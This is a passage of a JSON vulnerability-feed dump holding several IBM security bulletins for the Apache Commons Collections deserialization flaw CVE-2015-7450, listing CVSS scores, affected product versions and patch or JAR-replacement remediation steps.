5.9}, "published": "2018-06-15T07:04:15", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:15", "id": "41ADAB729B11FDB0C9A1ECE9F3517886DD3424A62720D68D65491C2312EABAA7", "href": "https://www.ibm.com/support/pages/node/272679", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:37", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Business Monitor. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [HTTP response splitting attack in WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21966837>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n * IBM Business Monitor V8.5.6.0\n * IBM Business Monitor V8.5.5.0\n * IBM Business Monitor V8.0.1.x\n * IBM Business Monitor V7.5.1.x\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:12", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Monitor", 
"bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:12", "id": "48A7A86609AA5A4F2D4F680FB304201D32309B43DF293404223682EC302FA4E5", "href": "https://www.ibm.com/support/pages/node/272157", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:36", "description": "## Summary\n\nC\u00faram SPM uses the Apache Commons Collections Library. Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM C\u00faram Social Program Management 5.2 \nIBM C\u00faram Social Program Management 6.0 SP2 \nIBM C\u00faram Social Program Management 6.0.4 \nIBM C\u00faram Social Program Management 6.0.5 \nIBM C\u00faram Social Program Management 6.1 \nIBM Care Management 6.0 \n\n## Remediation/Fixes\n\nProduct| VRMF| _Remediation/First Fix_ \n---|---|--- \nC\u00faram SPM| 5.2 SP6| Visit IBM Fix Central and upgrade to [5.2 SP6 EP9](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%2BCities&product=ibm/Other+software/Curam+Social+Program+Management&release=5.2&platform=All&function=all>) or a subsequent 5.2 Release \nC\u00faram SPM| 6.0 SP2| Visit IBM Fix Central and upgrade to [6.0 SP2 EP28](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%2BCities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.0&platform=All&function=all>) or a subsequent 6.0 Release \nC\u00faram SPM| 6.0.4.6| Visit IBM Fix Central and upgrade to [6.0.4.6 iFix2](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%2BCities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.0.4.6&platform=All&function=all>) or a subsequent 6.04 Release \nC\u00faram SPM| 6.0.5| Visit IBM Fix Central and upgrade to [6.0.5.9 iFix1](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%2BCities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.0.5.9&platform=All&function=all>) or a subsequent 6.0.5 Release \nC\u00faram SPM| 6.1| Visit IBM Fix Central and upgrade to 
[6.1.1 iFix1](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%2BCities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.1.1.0&platform=All&function=all>) or a subsequent 6.1 Release \nC\u00faram Care Management| 6.0| See Workarounds & Mitigations \n \n## Workarounds and Mitigations\n\n**Care Management Release:** \n \nCustomers should contact IBM C\u00faram support if they require a security fix. \n \n**For older revisions of C\u00faram SPM:** \n \nIt is recommended that customers upgrade to the latest C\u00faram SPM release to resolve this issue. Customers may apply the following steps to resolve the issue while they prepare to upgrade. \n \nThe 3.2.2 version of the [Commons Collections JAR](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>) should be used to replace the existing references at the following locations within the JDE deliverable: \n \n\\- CuramSDEJ\\lib\\commons-collections-3.x.jar (for 5.2 releases, the version is \"commons-collections-3.1.jar\", for all other releases it is \"commons-collections-3.2.1.jar\") - rename the newly downloaded Commons Collections JAR to match the name of the Commons Collections JAR file that is present in this location. Replace the existing Commons Collections JAR with the new JAR. It is important to rename the new JAR to match the JAR being replaced, as this ensures that no build script changes are required as a result of this update. \n \n\\- CuramCDEJ\\lib\\ext\\jar\\commons-collections.jar - replace this file with the newly downloaded JAR. 
\n \nCustomers can perform their process to test the changes, and then build and deploy to the required environment.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T13:06:24", "type": "ibm", "title": "Security Bulletin: Apache Commons Collections affects C\u00faram Social Program Management (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T13:06:24", "id": "7ADA99C6F6CBC1C4CB732F884DB11AD6B5BB2132DE3162727948C9DEE857DEB3", "href": "https://www.ibm.com/support/pages/node/272703", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:50:48", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Security Key Lifecycle Manager (SKLM). Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. 
\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s) | Affected Supporting Product and Version \n---|--- \nIBM Security Key Lifecycle Manager (SKLM) v2.5 on distributed platforms | WebSphere Application Server v8.5.5 \nIBM Security Key Lifecycle Manager (SKLM) v2.6 on distributed platforms | WebSphere Application Server v8.5.5.7 \n \n## Remediation/Fixes\n\n_None_\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:35:02", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (SKLM) (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T21:35:02", "id": 
"7196C8D1335ADFCDC76659DB37704C37F43BFC5EAAC5070B6B965CB49E2ED826", "href": "https://www.ibm.com/support/pages/node/271933", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:19", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Content Collector.\n\n## Vulnerability Details\n\n**CVEID**: CVE-2015-7450 \n**DESCRIPTION**: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Content Collector 2.2.0 - 4.0.1\n\n## Remediation/Fixes\n\n_Product_ | _VRMF_ | _Remediation/First Fix_ \n---|---|--- \nIBM Content Collector | 2.2.0 | Follow the guidance in [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for IBM WebSphere Application Server 7.0. \nIBM Content Collector on Windows 32-bit operating system | 3.0.0 - 4.0.1 | 1\\. Review the instructions in Interim Fix [_4.0.1.0-IBM-ICC-IF003_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=Enterprise%2BContent%2BManagement&product=ibm/Information+Management/Content+Collector&release=4.0.1.0&platform=ALL&function=fixId&fixids=4.0.1.0-IBM-ICC-IF003&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>), available from Fix Central. 2\\. 
Follow the guidance in [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for IBM WebSphere Application Server 8.0. \nIBM Content Collector on Windows 64-bit operating system | 3.0.0 - 4.0.1 | 1\\. Apply Interim Fix [_4.0.1.0-IBM-ICC-IF003_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=Enterprise%2BContent%2BManagement&product=ibm/Information+Management/Content+Collector&release=4.0.1.0&platform=ALL&function=fixId&fixids=4.0.1.0-IBM-ICC-IF003&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>), available from Fix Central. 2\\. Follow the guidance in [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for IBM WebSphere Application Server 8.0. \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:13:28", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Content Collector (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T12:13:28", "id": "8287275EEC72C6CC4E80477CA04131224FEE84C5F897F0E0579443793E0C38AF", "href": "https://www.ibm.com/support/pages/node/271957", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-12T02:10:42", "description": "## Summary\n\nIBM WebSphere\u00ae Application Server is shipped as a component of the following IBM Rational products: Collaborative Lifecycle Management (CLM), Rational Requirements Composer (RRC), Rational DOORS Next Generation (RDNG), Rational Engineering Lifecycle Manager (RELM), Rhapsody Design Manager (Rhapsody DM), Rational Software Architect Design Manager (RSA DM), Rational Team Concert (RTC), and Rational Quality Manager (RQM). Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nIBM Jazz Team Server may be deployed on either IBM WebSphere Application Server (WAS) or Apache Tomcat. This bulletin is for those deployments using WAS. 
\n \nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nRational Collaborative Lifecycle Management 3.0.1 - 6.0 \n \nRational Quality Manager 2.0 - 2.0.1 \nRational Quality Manager 3.0 - 3.0.1.6 \nRational Quality Manager 4.0 - 4.0.7 \nRational Quality Manager 5.0 - 5.0.2 \nRational Quality Manager 6.0 \n \nRational Team Concert 2.0 - 2.0.0.2 \nRational Team Concert 3.0 - 3.0.6 \nRational Team Concert 4.0 - 4.0.7 \nRational Team Concert 5.0 - 5.0.2 \nRational Team Concert 6.0 \n \nRational Requirements Composer 2.0 - 2.0.0.4 \nRational Requirements Composer 3.0 - 3.0.1.6 \nRational Requirements Composer 4.0 - 4.0.7 \n \nRational DOORS Next Generation 4.0 - 4.0.7 \nRational DOORS Next Generation 5.0 - 5.0.2 \nRational DOORS Next Generation 6.0 \n \nRational Engineering Lifecycle Manager 1.0- 1.0.0.1 \nRational Engineering Lifecycle Manager 4.0.3 - 4.0.7 \nRational Engineering Lifecycle Manager 5.0 - 5.0.2 \nRational Engineering Lifecycle Manager 6.0 \n \nRational Rhapsody Design Manager 3.0 - 3.0.1 \nRational Rhapsody Design Manager 4.0 - 4.0.7 \nRational Rhapsody Design Manager 5.0 - 5.0.2 \nRational Rhapsody Design Manager 6.0 \n \nRational Software Architect Design Manager 3.0 - 3.0.1 \nRational Software Architect Design Manager 4.0 - 4.0.7 \nRational Software Architect Design Manager 5.0 - 5.0.2 \nRational Software Architect Design Manager 6.0\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": 
"NONE"}, "impactScore": 5.9}, "published": "2021-04-28T18:35:50", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere\u00ae Application Server shipped with multiple IBM Rational products based on IBM's Jazz technology (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2021-04-28T18:35:50", "id": "6C099EB2D7A6A7FB08F677C5022E99A80942C8B6F6F4DD59D6C967A34499E8CB", "href": "https://www.ibm.com/support/pages/node/272731", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:40", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Enterprise Service Bus Registry Edition. 
Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Vulnerability in Apache Commons affect IBM WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nWebSphere Enterprise Service Bus Registry Edition - All versions\n\n## ", "cvss3": {}, "published": "2018-06-15T07:03:53", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in\u00a0WebSphere Application Server\u00a0shipped with\u00a0WebSphere Enterprise Service Bus Registry Edition (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:03:53", "id": "A6B089124F750729C2A5DCFDD551701AB74968E1A86A4C4BE83273F5F8E1BE38", "href": "https://www.ibm.com/support/pages/node/272873", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-24T05:46:43", "description": "## Summary\n\nWebSphere\u00ae Application Server is shipped with IBM\u00ae Intelligent Operations Center. 
Information about a security vulnerability affecting WebSphere\u00ae Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM\u00ae Intelligent Operations Center | V1.5.0, V1.6.0, V1.6.0.1, V1.6.0.2, V1.6.0.3, and V5.2.1 \nIBM\u00ae Intelligent Operations Center for Emergency Management | V1.6.0, V5.1.0, V5.1.0.2, V5.1.0.3, V5.1.0.4, and V5.1.0.6 \nIBM\u00ae Intelligent Operations for Waternamics | V5.1.0, V5.2.0, V5.2.0.1, V5.2.0.2, V5.2.0.3, V5.2.0.4, V5.2.0.5, V5.2.0.6, V5.2.1, and V5.2.1.1 \nIBM\u00ae Intelligent Water | V1.6.0, V1.6.1, V1.6.1.1, and V1.6.1.2 \n \n## Remediation/Fixes\n\nRefer to the following security bulletin for vulnerability details and information about fixes addressed by IBM\u00ae WebSphere Application Server which is shipped with IBM\u00ae Intelligent Operations Center: \n\nPrincipal Product and Version(s) | Affected Supporting Product and Versions | Affected Supporting Product Security Bulletin \n---|---|--- \nIBM\u00ae Intelligent Operations Center V1.5.0, V1.6.0, V1.6.0.1, V1.6.0.2, V1.6.0.3, and V5.2.1 | WebSphere\u00ae Application Server V7.0, V8.0, and V8.5 and V8.5.5 Traditional and Liberty | [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/271209> \"Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server \\(CVE-2015-7450\\)\" ) \nIBM\u00ae Intelligent Operations Center for Emergency Management V1.6.0, V5.1.0, V5.1.0.2, V5.1.0.3, V5.1.0.4, and V5.1.0.6 | | \nIBM\u00ae Intelligent Operations for Waternamics V5.1.0, V5.2.0, V5.2.0.1, V5.2.0.2, V5.2.0.3, V5.2.0.4, V5.2.0.5, V5.2.0.6, V5.2.1, and V5.2.1.1 | | \nIBM\u00ae Intelligent Water V1.6.0, V1.6.1, V1.6.1.1, and V1.6.1.2 | | \n \n## Workarounds and 
Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-27T13:02:15", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere\u00ae Application Server shipped with IBM\u00ae Intelligent Operations Center (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-01-27T13:02:15", "id": "F35FDA3FF3046C6563BADEA4BC09118605630A1545FA6231B3C59C74E1C66307", "href": "https://www.ibm.com/support/pages/node/1283512", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:39:12", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM WebSphere Application Server Patterns. 
Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)** | **Affected Supporting Product and Version** \n---|--- \nWebSphere Application Server Patterns, all versions| WebSphere Application Server Version 9.0 \n\n## Remediation/Fixes\n\nPlease consult the following security bulletin for vulnerability details and information about fixes \n\n * [Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105> \"Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable \\(CVE-2015-7450\\)\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-20T08:47:33", "type": "ibm", "title": "Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center bundled with IBM WebSphere Application Server Patterns", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-20T08:47:33", "id": "7AE79CBB38C9B30F603A5F44A9B8F142162D6B14888148AC3503AD993B81C776", "href": "https://www.ibm.com/support/pages/node/1111263", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T05:37:42", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Virtualization Engine TS7700.\n\n## Vulnerability Details\n\n**CVEID**: [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION**: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAll versions of microcode for the IBM Virtualization Engine TS7700 (3957-V06, 3957-V07, 3957-VEA, 3957-VEB) prior to release R2.1 are affected. All versions of R3.0 and R3.1 are also affected. In addition, microcode versions of releases R2.1, R3.2, and R3.3 prior to and including the following are also affected: \n\n**Release**\n\n| **Version** \n---|--- \nR3.3| 8.33.0.45 \nR3.2| 8.32.1.8 \nR2.1| 8.21.0.178 \n \n## Remediation/Fixes\n\nContact IBM Service at 1-800-IBM-SERV to arrange an upgrade to the latest microcode level followed by the installation of vtd_exec.202. 
Minimum microcode levels are shown below: \n\n**Release**\n\n| **Fix** \n---|--- \nR3.3| Upgrade to 8.33.0.45 or later + vtd_exec.202 \nR3.0, R3.1 or R3.2| Upgrade to 8.32.1.8 or later + vtd_exec.202 \nR2.1| Upgrade to 8.21.0.178 or later + vtd_exec.202 \nOlder Releases| Upgrade to 8.21.0.178 or later + vtd_exec.202 \n \nPlease note that vtd_exec packages carry their own internal version numbers. For the vulnerabilities reported in this Security Bulletin, the minimum required vtd_exec versions are as follows: **Package**| **Version** \n---|--- \nvtd_exec.202| 1.8 \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T00:10:15", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Virtualization Engine TS7700 (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T00:10:15", "id": 
